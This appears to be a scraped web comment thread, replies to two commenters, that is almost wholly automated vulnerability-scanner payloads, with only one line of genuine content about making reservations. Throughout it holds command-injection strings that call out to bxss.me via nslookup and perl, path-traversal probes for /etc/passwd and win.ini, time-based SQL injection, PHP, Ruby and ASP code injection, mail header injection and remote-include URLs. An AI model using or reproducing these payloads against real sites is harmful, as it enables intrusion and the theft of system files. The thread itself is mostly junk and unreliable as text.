&(nslookup hitxgtbkjdzmcb9b74.bxss.me||perl -e "gethostbyname('hitxgtbkjdzmcb9b74.bxss.me')")&'\"`0&(nslookup hitxgtbkjdzmcb9b74.bxss.me||perl -e "gethostbyname('hitxgtbkjdzmcb9b74.bxss.me')")&`'
re: paul_paulpiwat
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: paul_paulpiwat
|(nslookup hittmtqudyxryd929a.bxss.me||perl -e "gethostbyname('hittmtqudyxryd929a.bxss.me')")
re: paul_paulpiwat
file:///etc/passwd
re: paul_paulpiwat
`(nslookup hitgruhxqwmmp64f33.bxss.me||perl -e "gethostbyname('hitgruhxqwmmp64f33.bxss.me')")`
re: paul_paulpiwat
/\../\../\../\../\../\../\../etc/passwd
re: paul_paulpiwat
;(nslookup hitrhmysjbmnr32c76.bxss.me||perl -e "gethostbyname('hitrhmysjbmnr32c76.bxss.me')")|(nslookup hitrhmysjbmnr32c76.bxss.me||perl -e "gethostbyname('hitrhmysjbmnr32c76.bxss.me')")&(nslookup hitrhmysjbmnr32c76.bxss.me||perl -e "gethostbyname('hitrhmysjbmnr32c76.bxss.me')")
re: paul_paulpiwat
/WEB-INF/web.xml
re: paul_paulpiwat
C:\WINDOWS\system32\drivers\etc\hosts
re: paul_paulpiwat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: paul_paulpiwat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: paul_paulpiwat
../../../../../../../../../../windows/win.ini%00.jpg
re: paul_paulpiwat
Http://bxss.me/t/fit.txt
re: paul_paulpiwat
/../../../../../../../../../../boot.ini
re: paul_paulpiwat
http://bxss.me/t/fit.txt%3F.jpg
re: paul_paulpiwat
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: paul_paulpiwat
'.gethostbyname(lc('hitkg'.'aahypzud39ac6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(85).chr(97).chr(66).'
re: paul_paulpiwat
/etc/shells
re: paul_paulpiwat
..\..\..\..\..\..\..\..\windows\win.ini
re: paul_paulpiwat
".gethostbyname(lc("hitux"."nomrcvqqde339.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(88).chr(107).chr(88)."
re: paul_paulpiwat
c:/windows/win.ini
re: paul_paulpiwat
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: paul_paulpiwat
bxss.me
re: paul_paulpiwat
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: paul_paulpiwat
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: paul_paulpiwat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: paul_paulpiwat
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: paul_paulpiwat
WEB-INF/web.xml
re: paul_paulpiwat
HttP://bxss.me/t/xss.html?%00
re: paul_paulpiwat
WEB-INF\web.xml
re: paul_paulpiwat
"+"A".concat(70-3).concat(22*4).concat(116).concat(69).concat(99).concat(74)+(require"socket"
Socket.gethostbyname("hitdx"+"cvxhbiwlc8100.bxss.me.")[3].to_s)+"
re: paul_paulpiwat
bxss.me/t/xss.html?%00
re: paul_paulpiwat
'+'A'.concat(70-3).concat(22*4).concat(111).concat(65).concat(106).concat(67)+(require'socket'
Socket.gethostbyname('hitde'+'zxhewihne1402.bxss.me.')[3].to_s)+'
re: paul_paulpiwat
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: paul_paulpiwat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: paul_paulpiwat
';print(md5(31337));$a='
re: paul_paulpiwat
'"
re: paul_paulpiwat
";print(md5(31337));$a="
re: paul_paulpiwat
<!--
re: paul_paulpiwat
${@print(md5(31337))}
re: paul_paulpiwat
${@print(md5(31337))}\
re: paul_paulpiwat
'.print(md5(31337)).'
re: paul_paulpiwat
1
re: paul_paulpiwat
1
re: paul_paulpiwat
-1 OR 2+965-965-1=0+0+0+1 --
re: paul_paulpiwat
-1 OR 3+965-965-1=0+0+0+1 --
re: paul_paulpiwat
-1 OR 2+346-346-1=0+0+0+1
re: paul_paulpiwat
-1 OR 3+346-346-1=0+0+0+1
re: paul_paulpiwat
-1' OR 2+996-996-1=0+0+0+1 --
re: paul_paulpiwat
-1' OR 3+996-996-1=0+0+0+1 --
re: paul_paulpiwat
-1' OR 2+939-939-1=0+0+0+1 or 'BV7gNHyn'='
re: paul_paulpiwat
-1' OR 3+939-939-1=0+0+0+1 or 'BV7gNHyn'='
re: paul_paulpiwat
-1" OR 2+33-33-1=0+0+0+1 --
re: paul_paulpiwat
-1" OR 3+33-33-1=0+0+0+1 --
re: paul_paulpiwat
if(now()=sysdate(),sleep(15),0)
re: paul_paulpiwat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: paul_paulpiwat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: paul_paulpiwat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: paul_paulpiwat
-1; waitfor delay '0:0:15' --
re: paul_paulpiwat
-1); waitfor delay '0:0:15' --
re: paul_paulpiwat
1 waitfor delay '0:0:15' --
re: paul_paulpiwat
YEDRdUvB'; waitfor delay '0:0:15' --
re: paul_paulpiwat
-5 OR 691=(SELECT 691 FROM PG_SLEEP(15))--
re: paul_paulpiwat
-5) OR 78=(SELECT 78 FROM PG_SLEEP(15))--
re: paul_paulpiwat
-1)) OR 332=(SELECT 332 FROM PG_SLEEP(15))--
re: paul_paulpiwat
hmSvDXHj' OR 234=(SELECT 234 FROM PG_SLEEP(15))--
re: paul_paulpiwat
7r7K6vZb') OR 347=(SELECT 347 FROM PG_SLEEP(15))--
re: paul_paulpiwat
lSvr9kCt')) OR 402=(SELECT 402 FROM PG_SLEEP(15))--
re: paul_paulpiwat
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: paul_paulpiwat
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: paul_paulpiwat
'||(select 1 from (select pg_sleep(15))x)||'
re: paul_paulpiwat
''||(select 1 from (select pg_sleep(15))x)||''
re: paul_paulpiwat
1'"
re: paul_paulpiwat
@@wSqZx
re: paul_paulpiwat
1
re: paul_paulpiwat
1
re: paul_paulpiwat
1
re: paul_paulpiwat
1
re: paul_paulpiwat
1
re: paul_paulpiwat
1
re: paul_paulpiwat
1
re: paul_paulpiwat
1
re: paul_paulpiwat
1
re: paul_paulpiwat
1
There are times when walk-ins are allowed, but it is safe to make reservations in advance.
re: Leo Saito
LvNcTuWM
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+619-619-1=0+0+0+1
re: Leo Saito
-1 OR 3+619-619-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
IzzFck3d'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 555=(SELECT 555 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 253=(SELECT 253 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 73=(SELECT 73 FROM PG_SLEEP(15))--
re: Leo Saito
eon7ekMo' OR 642=(SELECT 642 FROM PG_SLEEP(15))--
re: Leo Saito
FfRTfvRR') OR 522=(SELECT 522 FROM PG_SLEEP(15))--
re: Leo Saito
UFLGOIFX')) OR 68=(SELECT 68 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@bHpVC
re: Leo Saito
h20rkm5M
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+347-347-1=0+0+0+1
re: Leo Saito
-1 OR 3+347-347-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
sZ3Gg9sX'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 141=(SELECT 141 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 372=(SELECT 372 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 288=(SELECT 288 FROM PG_SLEEP(15))--
re: Leo Saito
ew3NlbkT' OR 534=(SELECT 534 FROM PG_SLEEP(15))--
re: Leo Saito
nnDkWLqm') OR 688=(SELECT 688 FROM PG_SLEEP(15))--
re: Leo Saito
DWJF1Bv1')) OR 631=(SELECT 631 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@vXJNA
re: Leo Saito
1s0dmSMrO
re: Leo Saito
response.write(9926225*9723740)
re: Leo Saito
%0abcc:074625.67-10260.67.d2eec.19990.2@bxss.me
re: Leo Saito
'+response.write(9926225*9723740)+'
re: Leo Saito
to@example.com>%0d%0abcc:074625.67-10261.67.d2eec.19990.2@bxss.me
re: Leo Saito
"+response.write(9926225*9723740)+"
re: Leo Saito
<esi:include src="http://bxss.me/rpb.png"/>
re: Leo Saito
${10000296+9999835}
re: Leo Saito
../../../../../../../../../../../../../../etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../windows/win.ini
re: Leo Saito
file:///etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../../proc/version
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Leo Saito
../../../../../../../../../../etc/passwd%00.jpg
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Leo Saito
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Leo Saito
)
re: Leo Saito
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Leo Saito
!(()&&!|*|*|
re: Leo Saito
/etc/passwd
re: Leo Saito
^(#$!@#$)(()))******
re: Leo Saito
echo ihunkt$()\ kchwmz\nz^xyu||a #' &echo ihunkt$()\ kchwmz\nz^xyu||a #|" &echo ihunkt$()\ kchwmz\nz^xyu||a #
re: Leo Saito
%2fetc%2fpasswd
re: Leo Saito
&echo jcxrcf$()\ batuub\nz^xyu||a #' &echo jcxrcf$()\ batuub\nz^xyu||a #|" &echo jcxrcf$()\ batuub\nz^xyu||a #
re: Leo Saito
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Leo Saito
|echo zzjudz$()\ yhhvzn\nz^xyu||a #' |echo zzjudz$()\ yhhvzn\nz^xyu||a #|" |echo zzjudz$()\ yhhvzn\nz^xyu||a #
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Leo Saito
(nslookup hitidqlzulnur87385.bxss.me||perl -e "gethostbyname('hitidqlzulnur87385.bxss.me')")
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Leo Saito
$(nslookup hitovvelybvne7bd59.bxss.me||perl -e "gethostbyname('hitovvelybvne7bd59.bxss.me')")
re: Leo Saito
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Leo Saito
'.gethostbyname(lc('hitqf'.'wdhunzzj8cece.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(80).chr(105).chr(75).'
re: Leo Saito
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Leo Saito
&nslookup hitlxhdesmdcn9a97e.bxss.me&'\"`0&nslookup hitlxhdesmdcn9a97e.bxss.me&`'
re: Leo Saito
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Leo Saito
".gethostbyname(lc("hitil"."jaxtbajfdfbe2.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(67).chr(113).chr(72)."
re: Leo Saito
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Leo Saito
&(nslookup hitvisbvsvzvc94bff.bxss.me||perl -e "gethostbyname('hitvisbvsvzvc94bff.bxss.me')")&'\"`0&(nslookup hitvisbvsvzvc94bff.bxss.me||perl -e "gethostbyname('hitvisbvsvzvc94bff.bxss.me')")&`'
re: Leo Saito
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Leo Saito
Http://bxss.me/t/fit.txt
re: Leo Saito
|(nslookup hithlaqnzmqgi0a169.bxss.me||perl -e "gethostbyname('hithlaqnzmqgi0a169.bxss.me')")
re: Leo Saito
file:///etc/passwd
re: Leo Saito
http://bxss.me/t/fit.txt%3F.jpg
re: Leo Saito
`(nslookup hithrhbzqfyktf5fff.bxss.me||perl -e "gethostbyname('hithrhbzqfyktf5fff.bxss.me')")`
re: Leo Saito
/\../\../\../\../\../\../\../etc/passwd
re: Leo Saito
/etc/shells
re: Leo Saito
;(nslookup hitthftbjrsss89bfc.bxss.me||perl -e "gethostbyname('hitthftbjrsss89bfc.bxss.me')")|(nslookup hitthftbjrsss89bfc.bxss.me||perl -e "gethostbyname('hitthftbjrsss89bfc.bxss.me')")&(nslookup hitthftbjrsss89bfc.bxss.me||perl -e "gethostbyname('hitthftbjrsss89bfc.bxss.me')")
re: Leo Saito
/WEB-INF/web.xml
re: Leo Saito
c:/windows/win.ini
re: Leo Saito
C:\WINDOWS\system32\drivers\etc\hosts
re: Leo Saito
bxss.me
re: Leo Saito
../../../../../../../../../../windows/win.ini%00.jpg
re: Leo Saito
/../../../../../../../../../../boot.ini
re: Leo Saito
HttP://bxss.me/t/xss.html?%00
re: Leo Saito
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Leo Saito
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Leo Saito
bxss.me/t/xss.html?%00
re: Leo Saito
"+"A".concat(70-3).concat(22*4).concat(120).concat(71).concat(122).concat(80)+(require"socket"
Socket.gethostbyname("hitim"+"fimrgjmzbaf33.bxss.me.")[3].to_s)+"
re: Leo Saito
';print(md5(31337));$a='
re: Leo Saito
..\..\..\..\..\..\..\..\windows\win.ini
re: Leo Saito
'+'A'.concat(70-3).concat(22*4).concat(98).concat(74).concat(120).concat(73)+(require'socket'
Socket.gethostbyname('hituq'+'syywzgfg4616d.bxss.me.')[3].to_s)+'
re: Leo Saito
";print(md5(31337));$a="
re: Leo Saito
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Leo Saito
${@print(md5(31337))}
re: Leo Saito
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Leo Saito
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Leo Saito
${@print(md5(31337))}\
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Leo Saito
'.print(md5(31337)).'
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Leo Saito
'"
re: Leo Saito
